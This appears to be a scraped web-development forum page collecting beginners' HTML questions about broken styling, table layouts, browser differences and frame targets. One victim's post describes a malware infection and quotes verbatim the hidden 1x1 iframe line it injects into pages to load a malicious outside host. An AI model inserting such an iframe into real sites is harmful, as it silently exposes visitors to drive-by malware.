HTML - Screwed Up, Need Help
Hi, I am a complete newbie at HTML and web developing so I need a lot of help with this issue.
I had to maintain a website and all i had to was update some links in the web pages by editing them to keep them updated. before, everything was working fine, but when i edited one webpage I can no longer see the formatting/ style on the webpage. ok, this webpage is made of a header page, a display page, and a menu page. The menu page contains links to some other webpages and i had to update those links. this is how it used to look before basically by clicking the triangle i could go to the drop down menu and i could choose any chapter and itwould take me to the specific link and this is what i see after i edited the links in ms word now i STILL can go to the updated links BUT i lost the formatting/ style of the menu is there any way of changing that? pelase help Similar TutorialsIve never really made a massive sight before or anything too complicated so I decided to create a decennt website. I did it all in html with some flash and obviously some images. I created all of the alignment, etc using tables. I loaded it up and was quite happy that it was looking alright and then I loaded it up in Internet Explorer and half my content is missing. My flash doesnt load properly (what is there) and I cant get my head around how a browser change could cause such a difference. Firefox: Internet Explorer: Ive attached the index file incase anyone wanted to have a look at it and can make a bit of sense as to what this problem could be. Thanks in advance for any help. I have a table here where it says "Additional Info About bundyxc". It's screwed up in both IE and Firefox. Everything is fine about the table, except it's too long on the right site (you can see the green bar doesn't quite span the entire table). The border is just sticking out a little too far, and I don't know how to change this. Any ideas? Can anyone take a look at the code over he http://healthclub90.com/az342h/health/blahblah.html and tell me whats wrong with the code so that the image of the brown box isn't all screwed up ? Thank you! Okay, I've got this web page designed by somebody else. I've messed with it a bit over the years and last night I decided I wanted to insert a bunch of icons connecting to another site. I realized it would have to be done with a table and I made one & put it in the appropriate place on the web page! Hooray. But everything After the table has now shifted over to a narrow column on the left hand side. I'm hoping I can send an attachment of the html and somebody can tell me how to get out of whatever is messing up the formatting after the table. I'm not really a coder but better at designing the actually template...but I'm always left to coding it anyways... I just need some help smoothing things out because right now it looks terrible in all browsers Heres what its supposed to look like: it looks a mess in firefox but ok on Internet Explore http://www.sendspace.com/file/v3t00e Thanks if you could help me sort things out hi, This might be a wrong place to post this topic. But I am really screwed up by a malware "jL.chura.pl/rc/". May be some of you has faced similar problem. So I am seeking help here. I am getting no proper removal instructions on web for the malware. Symptoms- 1) Modify all .html, .php, .asp files on the PC by inserting a line "<iframe src="http://jL.chUra.pl/rc/" width=1 height=1 frameborder=0></iframe>" at the end of <body> tag. 2) Even if you try to remove it, the same line comes again in the file after colsing the file. 3) When you open the html pages in browser while internet is connected, these webpages try to connect to a website "http:/jL.chura.pl/rc/". May be it try to send some data from PC. 4) Antivirus like Symantec gives warning like "Malicious pdf request found" and block the webpages. 5) Doesnt change the Last modifed date of the file. 6) It works in safe mode also. I searched in all the programs and registry running on my machine. I found nothing. My all html and php webpages has been infected and I am not able to remove the <iframe> tag from any of the file. Do anybody knows the removal and cleaning procedure for this? Can anybody please help me out? I dont want to format my system. Regards, html_jaas Hi- Is there a way a frame target is screwed up? I have my frameset defined as <frameset rows="30, 83%" cols="1*" border="0"> <frame name="top" scrolling="no" marginwidth="10" marginheight="14" src="top.aspx"> <frameset rows="1*" cols="30%, 70%"> <frame name="left_target" scrolling="auto" marginwidth="10" marginheight="14" noresize src="left_meaning.aspx"> <frame name="right_target" scrolling="yes" marginwidth="10" marginheight="14" src="right_meaning.aspx"> </frameset> </frameset> and insde "right" frame, all <a> links have target to "left." But it load some external java script before so I assume that is where target is screwed up. But if i set hyperlink as follow: <A target="left_target" href="http://www.yahoo.com">aa</a> that the target set here should override whatever that comes before it, shouldn't it? Thanks for your help |